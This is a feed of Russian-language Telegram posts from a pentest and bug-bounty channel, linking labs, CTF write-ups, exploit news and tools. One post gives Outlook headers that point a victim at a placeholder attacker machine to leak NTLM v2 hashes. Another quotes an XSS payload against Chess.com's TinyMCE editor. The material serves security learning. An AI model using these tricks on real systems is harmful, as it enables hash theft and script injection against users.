📌 Ловите теоретический и практический гайд от PortSwigger, из которого вы получите базовые навыки. Ниже — только некоторые из примеров лабораторий:
• Excessive trust in client-side controls
• Failing to handle unconventional input
• Making flawed assumptions about user behavior
• Domain-specific flaws
• Providing an encryption oracle
#bugbounty #pentest #practice
Please open Telegram to view this post
VIEW IN TELEGRAM
portswigger.net
Examples of business logic vulnerabilities | Web Security Academy
Business logic vulnerabilities are relatively specific to the context in which they occur. However, although individual instances of logic flaws differ ...
👍1
📦 HTB Sandworm: выходим из песочницы Firejail и повышаем привилегии в Linux
📦 HTB Pilgrimage: повышаем привилегии через уязвимость в Binwalk
📦 HTB Cybermonday: эксплуатируем путаницу ключей JWT
📦 HTB Authority: повышаем привилегии в Windows через ESC1 и Pass the Cert
📦 HTB Coder: реверсим шифровальщик и применяем технику ESC5
📦 HTB Sau: раскручиваем цепочку SSRF и инъекций команд до захвата веб-сервера
📦 HTB Zipping: используем инъекцию нулевого байта в ZIP-архиве, чтобы загрузить шелл
📦 HTB Bookworm: эксплуатируем сложную XSS с байпасом CSP
🔍 Лабы по форензике: Knock Knock и Tick Tock
#writeup #pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8
📌 На соревнованиях были продемонстрированы 49 0-day в автомобильных информационно-развлекательных платформах, ОС и устройствах зарядки электромобилей. Немного деталей об атаках, которые показали исследователи:
• Два взлома окружения на базе дистрибутива Automotive Grade Linux ($47500, $35000)
• Взлом информационно-развлекательной системы автомобиля Tesla
• Взлом модема, используемого в автомобиле Tesla
• Пять взломов информационно-развлекательной системы на базе платформы Sony XAV-AX5500
• Взлом информационно-развлекательной системы на базе платформы Pioneer DMH-WT7600NEX
• Шесть взломов информационно-развлекательной системы на базе платформы Alpine Halo9 iLX-F509
• Два взлома зарядной станции Ubiquiti Connect EV Station
• Три взлома зарядной станции Phoenix Contact CHARX SEC-3100
• Взлом зарядной станции EMPORIA EV Charger Level 2
• Четыре взлома зарядной станции JuiceBox 40 Smart EV
• Семь взломов домашней зарядной станции ChargePoint Home Flex, позволивших выполнить код на уровне прошивки устройства
• Три взлома зарядной станции Autel MaxiCharger AC Wallbox Commercial
#hackevent
Please open Telegram to view this post
VIEW IN TELEGRAM
🥰4❤3
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍9👏2
Команда Varonis обнаружила новую багу в функции обмена календарями в Microsoft Outlook, при котором добавление двух заголовков в электронное письмо заставляет Outlook делиться контентом и связываться с указанной машиной, создавая возможность перехвата хэша NTLM v2.
К слову, это новый способ получения NTLM-хэшей среди двух других новых способов: с помощью Windows Performance Analyzer и проводника Windows.
Для тех, кто не знает, NTLM v2 — это криптографический протокол, используемый Windows для аутентификации пользователей на удаленных серверах. Хотя NTLM v2 является более безопасной версией оригинального NTLM, v2 все еще уязвим для атак методом брутфорса и не только.
📌 Те самые заголовки Outlook:
"Content-Class" = "Sharing"
"x-sharing-config-url" = \\(Attacker machine)\a.ics
#pentest #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6
📦 Невероятно крутые и доступные в понимании (особенно если смотреть после прочтения райтапа) видеоразборы заданий с HackTheBox от архитектора лабораторий.
Вот, например, разбор SSTI в приложении на Flask, взлом PyJWT и реверс/брутфорс TOPT Browser Plugin Export.
📺 Смотреть плейлист
#ctf #pentest #practice
Вот, например, разбор SSTI в приложении на Flask, взлом PyJWT и реверс/брутфорс TOPT Browser Plugin Export.
#ctf #pentest #practice
Please open Telegram to view this post
VIEW IN TELEGRAM
👏3
🛠 btop — инструмент для мониторинга ресурсов системы, который выводит статистку использования процессора, памяти, сети и дисков. Это альтернатива привычного вам инструмента с более приятным UI, поддержкой мыши, простой сортировкой/фильтрацией, кастомными настройками, возможностью отображения индикатора батареи и т. д.
👉 GutHub
#tools #linux
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12
📙 Книга тайных знаний — тщательно подобранная коллекция ресурсов, руководств, шпаргалок, блогов, советов, однострочников, CLI-инструментов и многого другого для системных и сетевых администраторов, DevOps-специалистов, пентестеров и исследователей безопасности.
👉 GitHub
#cheatsheet
👉 GitHub
#cheatsheet
👏3😁1
Всеволод Кокорин, исследователь безопасности в SolidLab, делится историей нахождения уязвимости и описывает технические аспекты, которые привели к её возникновению. Сама уязвимость существовала в течение длительного времени и была устранена в октябре 2023 года.
📌 Вы узнаете про Service Worker + PWA, про аспекты, связанные с Payment Request API и спецификацией JIT-installed воркеров, а также про то, как архитектурные решения в веб-приложениях могут привести к серьезным багам.
👉 Читать
#pentest #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6❤3🥰3
🧰GOAD — одна из самых актуальных и самодостаточных тестовых лаб для пентеста окружения на базе Active Directory.
Главная цель — предоставить пентестерам уязвимую среду Active Directory, готовую к использованию для отработки основных атак, включая:
• Password reuse between computer (PTH)
• Spray User = Password
• Password in description
• SMB share anonymous
• SMB not signed
• Responder
• Zerologon
• Windows defender
• ASREPRoast
• Kerberoasting
• AD Acl abuse
• Unconstraint delegation
• Ntlm relay
• Constrained delegation
• Install MSSQL
• MSSQL trusted link
• MSSQL impersonate
• Install IIS
• Upload asp app
• Multiples forest
• Anonymous RPC user listing
• Child parent domain
• Generate certificate and enable ldaps
• ADCS - ESC 1/2/3/4/6/8
• Certifry
• Samaccountname/nopac
• Petitpotam unauthent
• Printerbug
• Drop the mic
• Shadow credentials
• Mitm6
• Add LAPS
• GPO abuse
• Add Webdav
• Add RDP bot
• Add full proxmox integration
• Add Gmsa и многие другие
#practice #pentest
Главная цель — предоставить пентестерам уязвимую среду Active Directory, готовую к использованию для отработки основных атак, включая:
• Password reuse between computer (PTH)
• Spray User = Password
• Password in description
• SMB share anonymous
• SMB not signed
• Responder
• Zerologon
• Windows defender
• ASREPRoast
• Kerberoasting
• AD Acl abuse
• Unconstraint delegation
• Ntlm relay
• Constrained delegation
• Install MSSQL
• MSSQL trusted link
• MSSQL impersonate
• Install IIS
• Upload asp app
• Multiples forest
• Anonymous RPC user listing
• Child parent domain
• Generate certificate and enable ldaps
• ADCS - ESC 1/2/3/4/6/8
• Certifry
• Samaccountname/nopac
• Petitpotam unauthent
• Printerbug
• Drop the mic
• Shadow credentials
• Mitm6
• Add LAPS
• GPO abuse
• Add Webdav
• Add RDP bot
• Add full proxmox integration
• Add Gmsa и многие другие
#practice #pentest
👍4
Внутри каждого из нас живет критик. А как вы справляетесь со своим?
Anonymous Poll
21%
Хвалю себя за маленькие шаги
43%
Трезво оцениваю ситуацию
17%
Заменяю негативные мысли позитивными
16%
Критикую его в ответ
30%
Не справляюсь
4%
Свой вариант (напишу в комментарии)
This media is not supported in your browser
VIEW IN TELEGRAM
🤛 Windows 10 очень любит Интернет. Обновления, синхронизации, телеметрия и ещё куча разной другой очень нужной ей информации постоянно гуляет через наши сетевые соединения.
🤦 Одним словом, хорошего мало. Чтобы подобного не происходило, надо «заткнуть рот Windows», то есть сделать так, чтобы она самостоятельно перестала «стучаться» в Интернет, устанавливать обновления и заниматься прочими непотребствами.
😎 Читайте подробнее о том, какие именно сетевые возможности винды можно отключить, чтобы это прошло без последствий.
#security
🤦 Одним словом, хорошего мало. Чтобы подобного не происходило, надо «заткнуть рот Windows», то есть сделать так, чтобы она самостоятельно перестала «стучаться» в Интернет, устанавливать обновления и заниматься прочими непотребствами.
😎 Читайте подробнее о том, какие именно сетевые возможности винды можно отключить, чтобы это прошло без последствий.
#security
🧑💻 Статьи для IT: как объяснять и распространять значимые идеи
Напоминаем, что у нас есть бесплатный курс для всех, кто хочет научиться интересно писать — о программировании и в целом.
Что: семь модулей, посвященных написанию, редактированию, иллюстрированию и распространению публикаций.
Для кого: для авторов, копирайтеров и просто программистов, которые хотят научиться интересно рассказывать о своих проектах.
👉Материалы регулярно дополняются, обновляются и корректируются. А еще мы отвечаем на все учебные вопросы в комментариях курса.
Напоминаем, что у нас есть бесплатный курс для всех, кто хочет научиться интересно писать — о программировании и в целом.
Что: семь модулей, посвященных написанию, редактированию, иллюстрированию и распространению публикаций.
Для кого: для авторов, копирайтеров и просто программистов, которые хотят научиться интересно рассказывать о своих проектах.
👉Материалы регулярно дополняются, обновляются и корректируются. А еще мы отвечаем на все учебные вопросы в комментариях курса.
👍1
🧰 Jenkins можно часто встретить в инфраструктуре в ходе пентеста. Это популярный инструмент автоматизации, широко используемый в процессах CI/CD.
📌 Если встретите, просто откройте эти заметки, — в них перечислены основные CVE/poc’и и полезные скрипты/советы для пентеста:
☑️ Password spraying
☑️ Дамп сборок для поиска секретов в открытом виде
☑️ Файлы, на которые обратить внимание после компрометации
☑️ Дешифрование секретов Jenkins онлайн и многое другое
#pentest #tools
📌 Если встретите, просто откройте эти заметки, — в них перечислены основные CVE/poc’и и полезные скрипты/советы для пентеста:
☑️ Password spraying
☑️ Дамп сборок для поиска секретов в открытом виде
☑️ Файлы, на которые обратить внимание после компрометации
☑️ Дешифрование секретов Jenkins онлайн и многое другое
#pentest #tools
♟От ладьи до XSS: история простого, но не самого очевидного бага на топовом шахматном сайте Chess.com
Многие говорят, что ломать те сервисы, которыми пользуешься каждый день, намного круче. Так и получилось у исследователя, который возился с настройками профиля и наткнулся на редактор
📌 Читайте подробнее, как ему удалось дойти до такого пэйлоада:
#bugbounty #pentest
Многие говорят, что ломать те сервисы, которыми пользуешься каждый день, намного круче. Так и получилось у исследователя, который возился с настройками профиля и наткнулся на редактор
TinyMCE
с возможностью загрузки изображений. 📌 Читайте подробнее, как ему удалось дойти до такого пэйлоада:
<p><img src="a.png" style="display: block; margin: 0 auto;" srcset=url(https://images.chesscomfiles.com/onerror=eval(atob("YWxlcnQoMSk=)));2+4//></p>
#bugbounty #pentest
Skii.dev
Rook to XSS: How I hacked chess.com with a rookie exploit
Playing Chess is one of the many hobbies I like to do in my spare time, apart from tinkering around with technology. However, I'm not very good at it, and after losing many games, I decided to see if I could do something I'm much better at; hacking the system!
👍5😁3